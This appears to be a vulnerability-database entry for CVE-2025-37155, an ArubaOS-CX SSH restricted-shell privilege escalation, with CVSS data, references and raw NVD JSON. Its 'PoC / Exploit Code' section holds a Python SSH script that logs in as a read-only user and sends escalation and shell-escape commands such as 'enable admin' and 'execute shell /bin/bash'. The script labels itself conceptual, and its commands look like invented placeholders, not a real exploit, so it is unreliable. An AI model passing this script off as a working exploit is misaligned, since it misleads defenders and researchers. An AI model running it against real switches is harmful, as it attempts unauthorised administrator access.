CVE-2025-37155

Description

A vulnerability in the SSH restricted shell interface of the network management services allows improper access control for authenticated read-only users. If successfully exploited, this vulnerability could allow an attacker with read-only privileges to gain administrator access on the affected system.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE

HPE网络管理服务 SSH restricted shell接口 - 所有受影响的版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-37155 PoC - SSH Restricted Shell Privilege Escalation
Note: This is a conceptual PoC for educational and security research purposes only.
"""

import paramiko
import sys

def exploit_cve_2025_37155(target_ip, username, password):
    """
    Exploit for CVE-2025-37155 - SSH Restricted Shell Privilege Escalation
    
    This PoC demonstrates how an authenticated read-only user can escalate
    privileges to administrator level through the SSH restricted shell interface.
    """
    try:
        # Connect to target via SSH with read-only credentials
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(target_ip, username=username, password=password, timeout=10)
        
        # Execute commands through restricted shell
        # The vulnerability allows bypassing privilege restrictions
        commands = [
            # Attempt to access admin functions (should be blocked for read-only users)
            'enable admin',  # Privilege escalation attempt
            'show running-config',  # Read sensitive config
            'modify system settings',  # Configuration modification
            'execute shell /bin/bash'  # Shell escape attempt
        ]
        
        for cmd in commands:
            stdin, stdout, stderr = client.exec_command(cmd)
            output = stdout.read().decode('utf-8')
            error = stderr.read().decode('utf-8')
            
            if output or error:
                print(f"Command: {cmd}")
                print(f"Output: {output}")
                print(f"Error: {error}")
                print("-" * 50)
        
        client.close()
        return True
        
    except Exception as e:
        print(f"Exploitation failed: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python3 poc.py <target_ip> <username> <password>")
        sys.exit(1)
    
    exploit_cve_2025_37155(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37155
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37155
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37155/
[4] VulDB https://vuldb.com/cve/CVE-2025-37155
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37155", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:47.170", "lastModified": "2025-12-04T18:21:05.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the SSH restricted shell interface of the network management services allows improper access control for authenticated read-only users. If successfully exploited, this vulnerability could allow an attacker with read-only privileges to gain administrator access on the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0000", "versionEndExcluding": "10.10.1170", "matchCriteriaId": "3FEB3830-A052-4585-BF45-9E221FA06D43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.13.0000", "versionEndExcluding": "10.13.1101", "matchCriteriaId": "0490B2CA-4273-426E-8776-814D242834B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.14.0000", "versionEndExcluding": "10.14.1060", "matchCriteriaId": "21AC81E3-A4C8-4120-AEEA-46123B84A250"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0000", "versionEndExcluding": "10.15.1030", "matchCriteriaId": "FB5ADE5E-72CB-41E0-B7A0-08BEBB94ED8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.16.0000", "versionEndExcluding": "10.16.1001", "matchCriteriaId": "5CF58D01-F13F-4DAF-B6A1-D91AEC7F19B3"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}